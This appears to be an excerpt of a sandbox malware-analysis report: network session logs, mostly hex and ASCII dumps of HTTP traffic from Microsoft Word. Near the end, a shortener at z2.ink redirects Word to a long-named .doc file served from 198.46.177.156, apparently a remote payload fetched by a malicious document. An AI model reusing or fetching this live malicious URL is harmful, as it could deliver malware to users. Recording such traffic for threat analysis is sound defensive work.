                                  Data Ascii: font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4exQ.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 600;font-stretch:
                                  May 27, 2024 18:35:13.631078959 CEST1236INData Raw: 73 74 72 65 74 63 68 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76
                                  Data Ascii: stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVc.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 600;
                                  May 27, 2024 18:35:13.631094933 CEST1236INData Raw: 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 66 6f 6e 74 2d 77 65 69 67 68
                                  Data Ascii: format('woff');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4exg.w
                                  May 27, 2024 18:35:13.631287098 CEST1236INData Raw: 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67
                                  Data Ascii: format('woff');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVQ.wof
                                  May 27, 2024 18:35:13.631303072 CEST1236INData Raw: 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38 74 57 5a 30 50 77 38 36 68 64 30 52 6b 35 68 6b 57 56 34 65 77 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61
                                  Data Ascii: ns/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4ewA.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s
                                  May 27, 2024 18:35:13.631326914 CEST1236INData Raw: 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 53 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 76 57 62 58 32 76 56 6e 58 42 62 4f 62 6a 32 4f 56 5a 79 4f 4f 53 72 34 64 56 4a 57 55 67 73 69 48 30 42 34 75 61 56 49 2e 77
                                  Data Ascii: c.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsiH0B4uaVI.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gs
                                  May 27, 2024 18:35:13.631530046 CEST1236INData Raw: 26 23 30 33 38 3b 73 75 62 73 65 74 3d 6c 61 74 69 6e 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 20 2a 2f 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 55 6e 6b 6e 6f 77 6e 3b 20 4c 69 6e 75 78 20
                                  Data Ascii: &#038;subset=latin&#038;display=swap *//* User Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1 */@font-face {font-family: 'Monoton';font-style: normal;font-weight: 400;font-display: swap;s
                                  May 27, 2024 18:35:13.631546974 CEST1236INData Raw: 75 65 72 79 2c 24 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 30 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 7d 2c 6a 51 75 65 72 79 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e
                                  Data Ascii: uery,$=window.jQuery,customHeadScripts=!0,jQuery.noConflict},jQuery.ready=function(r){jqueryParams=[...jqueryParams,r]},$.ready=function(r){jqueryParams=[...jqueryParams,r]},jQuery.load=function(r){jqueryParams=[...jqueryParams,r]},$.load=func
                                  May 27, 2024 18:35:13.636672020 CEST1236INData Raw: 65 74 61 0a 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 42 72 61 6e 64 6c 69 6e 6b 20 45 64 67 65 22 3e 3c 6d 65 74 61 0a 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a
                                  Data Ascii: etaname="twitter:title" content="Not Found - Brandlink Edge"><metaname="twitter:label1" content="Written by"><metaname="twitter:data1" content="tianqi"><metaname="twitter:label2" content="Time to read"><metaname="twitter:data2" content="L


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.224916454.241.153.192801020C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 18:35:14.116738081 CEST128OUTOPTIONS / HTTP/1.1
                                  User-Agent: Microsoft Office Protocol Discovery
                                  Host: z2.ink
                                  Content-Length: 0
                                  Connection: Keep-Alive
                                  May 27, 2024 18:35:14.713757992 CEST1236INHTTP/1.1 404 Not Found
                                  Content-Type: text/html; charset=utf-8
                                  Edge: smart-1.high-performance.network
                                  Date: Mon, 27 May 2024 16:35:14 GMT
                                  Content-Length: 102317
                                  Server: LINKSGPT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Connection: keep-alive
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><htmllang=en-US prefix="og: https://ogp.me/ns#"><head><style>img.lazy{min-height:1px}</style><linkrel=preload href=https://d3btrheyejmivy.cloudfront.net/edge/wp-content/plugins/w3-total-cache/pub/js/lazyload.min.js as=script><metacharset="UTF-8"><metahttp-equiv="X-UA-Compatible" content="IE=edge"><linkrel=pingback href=https://face.linksgpt.com/edge/xmlrpc.php> <script>document.documentElement.className = 'js';</script> <linkrel=preconnect href=https://fonts.gstatic.com crossorigin><style id=et-divi-open-sans-inline-css>/*<![CDATA[*//* Original: https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800&#038;subset=latin,latin-ext&#038;display=swap *//* User Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1 */@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 300;font-stretch: normal;font-display: swap;src: url
                                  May 27, 2024 18:35:14.713804007 CEST224INData Raw: 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38
                                  Data Ascii: (https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4exQ.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;
                                  May 27, 2024 18:35:14.713840008 CEST1236INData Raw: 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69
                                  Data Ascii: font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4exQ.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 600;font-stretch:
                                  May 27, 2024 18:35:14.713918924 CEST1236INData Raw: 73 74 72 65 74 63 68 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76
                                  Data Ascii: stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVc.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 600;
                                  May 27, 2024 18:35:14.713953018 CEST1236INData Raw: 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 66 6f 6e 74 2d 77 65 69 67 68
                                  Data Ascii: format('woff');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4exg.w
                                  May 27, 2024 18:35:14.713987112 CEST672INData Raw: 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67
                                  Data Ascii: format('woff');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVQ.wof
                                  May 27, 2024 18:35:14.714020967 CEST1236INData Raw: 6d 53 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 76 57 62 58 32 76 56 6e 58 42 62 4f 62 6a 32 4f 56 5a 79 4f 4f 53 72 34 64 56 4a 57 55 67 73 67 2d 31 78 34 75 61 56 51 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66
                                  Data Ascii: mSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsg-1x4uaVQ.woff) format('woff');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 800;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/
                                  May 27, 2024 18:35:14.714056015 CEST1236INData Raw: 73 74 72 65 74 63 68 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76
                                  Data Ascii: stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0RkyFjWV4ewA.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 80
                                  May 27, 2024 18:35:14.714090109 CEST1236INData Raw: 66 6f 6e 74 2d 73 74 72 65 74 63 68 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73
                                  Data Ascii: font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsg-1x4uaVI.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight:
                                  May 27, 2024 18:35:14.714127064 CEST1236INData Raw: 32 30 31 30 30 31 30 31 20 46 69 72 65 66 6f 78 2f 33 39 2e 30 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4d 6f 6e 6f 74 6f 6e 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74
                                  Data Ascii: 20100101 Firefox/39.0 */@font-face {font-family: 'Monoton';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/monoton/v15/5h1aiZUrOngCibe4TkHLQg.woff2) format('woff2');}/*...*/</style><script>let jquery
                                  May 27, 2024 18:35:14.719958067 CEST1236INData Raw: 74 61 0a 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 72 74 69 63 6c 65 22 3e 3c 6d 65 74 61 0a 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 6f 74 20 46 6f 75
                                  Data Ascii: taproperty="og:type" content="article"><metaproperty="og:title" content="Not Found - Brandlink Edge"><metaproperty="og:url" content="https://face.linksgpt.com/edge/?p=28"><metaproperty="og:site_name" content="Brandlink Edge"><metaproperty


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.224916554.241.153.192801020C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 18:35:14.886816978 CEST128OUTOPTIONS / HTTP/1.1
                                  User-Agent: Microsoft Office Protocol Discovery
                                  Host: z2.ink
                                  Content-Length: 0
                                  Connection: Keep-Alive
                                  May 27, 2024 18:35:15.506062984 CEST1236INHTTP/1.1 404 Not Found
                                  Content-Type: text/html; charset=utf-8
                                  Edge: smart-1.high-performance.network
                                  Date: Mon, 27 May 2024 16:35:15 GMT
                                  Content-Length: 102317
                                  Server: LINKSGPT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Connection: keep-alive
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><htmllang=en-US prefix="og: https://ogp.me/ns#"><head><style>img.lazy{min-height:1px}</style><linkrel=preload href=https://d3btrheyejmivy.cloudfront.net/edge/wp-content/plugins/w3-total-cache/pub/js/lazyload.min.js as=script><metacharset="UTF-8"><metahttp-equiv="X-UA-Compatible" content="IE=edge"><linkrel=pingback href=https://face.linksgpt.com/edge/xmlrpc.php> <script>document.documentElement.className = 'js';</script> <linkrel=preconnect href=https://fonts.gstatic.com crossorigin><style id=et-divi-open-sans-inline-css>/*<![CDATA[*//* Original: https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800&#038;subset=latin,latin-ext&#038;display=swap *//* User Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1 */@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 300;font-stretch: normal;font-display: swap;src: url
                                  May 27, 2024 18:35:15.506138086 CEST224INData Raw: 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38
                                  Data Ascii: (https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4exQ.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;
                                  May 27, 2024 18:35:15.506174088 CEST1236INData Raw: 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69
                                  Data Ascii: font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4exQ.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 600;font-stretch:
                                  May 27, 2024 18:35:15.506280899 CEST1236INData Raw: 73 74 72 65 74 63 68 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76
                                  Data Ascii: stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVc.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 600;
                                  May 27, 2024 18:35:15.506315947 CEST1236INData Raw: 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 66 6f 6e 74 2d 77 65 69 67 68
                                  Data Ascii: format('woff');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4exg.w
                                  May 27, 2024 18:35:15.506469011 CEST1236INData Raw: 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67
                                  Data Ascii: format('woff');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVQ.wof
                                  May 27, 2024 18:35:15.506520033 CEST1236INData Raw: 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38 74 57 5a 30 50 77 38 36 68 64 30 52 6b 35 68 6b 57 56 34 65 77 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61
                                  Data Ascii: ns/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4ewA.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s
                                  May 27, 2024 18:35:15.506555080 CEST1236INData Raw: 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 53 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 76 57 62 58 32 76 56 6e 58 42 62 4f 62 6a 32 4f 56 5a 79 4f 4f 53 72 34 64 56 4a 57 55 67 73 69 48 30 42 34 75 61 56 49 2e 77
                                  Data Ascii: c.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsiH0B4uaVI.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gs
                                  May 27, 2024 18:35:15.506767035 CEST1236INData Raw: 26 23 30 33 38 3b 73 75 62 73 65 74 3d 6c 61 74 69 6e 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 20 2a 2f 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 55 6e 6b 6e 6f 77 6e 3b 20 4c 69 6e 75 78 20
                                  Data Ascii: &#038;subset=latin&#038;display=swap *//* User Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1 */@font-face {font-family: 'Monoton';font-style: normal;font-weight: 400;font-display: swap;s
                                  May 27, 2024 18:35:15.506802082 CEST1236INData Raw: 75 65 72 79 2c 24 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 30 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 7d 2c 6a 51 75 65 72 79 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e
                                  Data Ascii: uery,$=window.jQuery,customHeadScripts=!0,jQuery.noConflict},jQuery.ready=function(r){jqueryParams=[...jqueryParams,r]},$.ready=function(r){jqueryParams=[...jqueryParams,r]},jQuery.load=function(r){jqueryParams=[...jqueryParams,r]},$.load=func
                                  May 27, 2024 18:35:15.511158943 CEST1236INData Raw: 65 74 61 0a 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 42 72 61 6e 64 6c 69 6e 6b 20 45 64 67 65 22 3e 3c 6d 65 74 61 0a 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a
                                  Data Ascii: etaname="twitter:title" content="Not Found - Brandlink Edge"><metaname="twitter:label1" content="Written by"><metaname="twitter:data1" content="tianqi"><metaname="twitter:label2" content="Time to read"><metaname="twitter:data2" content="L


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.224916654.241.153.192801020C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 18:35:15.620872021 CEST111OUTHEAD /nXPJ HTTP/1.1
                                  Connection: Keep-Alive
                                  User-Agent: Microsoft Office Existence Discovery
                                  Host: z2.ink
                                  May 27, 2024 18:35:16.201503038 CEST468INHTTP/1.1 301 Moved Permanently
                                  Content-Type: text/html; charset=utf-8
                                  Edge: smart-1.high-performance.network
                                  Location: http://198.46.177.156/xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc
                                  Date: Mon, 27 May 2024 16:35:11 GMT
                                  Vary: Accept-Encoding
                                  Server: LINKSGPT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Content-Length: 108
                                  Connection: keep-alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.2249167198.46.177.156801020C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 18:35:16.216969967 CEST260OUTHEAD /xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc HTTP/1.1
                                  Connection: Keep-Alive
                                  User-Agent: Microsoft Office Existence Discovery
                                  Host: 198.46.177.156
                                  May 27, 2024 18:35:16.738387108 CEST321INHTTP/1.1 200 OK
                                  Date: Mon, 27 May 2024 16:35:16 GMT
                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                  Last-Modified: Sun, 26 May 2024 17:14:39 GMT
                                  ETag: "70ea-6195e893196e9"
                                  Accept-Ranges: bytes
                                  Content-Length: 28906
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: application/msword
                                  May 27, 2024 18:35:16.951937914 CEST321INHTTP/1.1 200 OK
                                  Date: Mon, 27 May 2024 16:35:16 GMT
                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
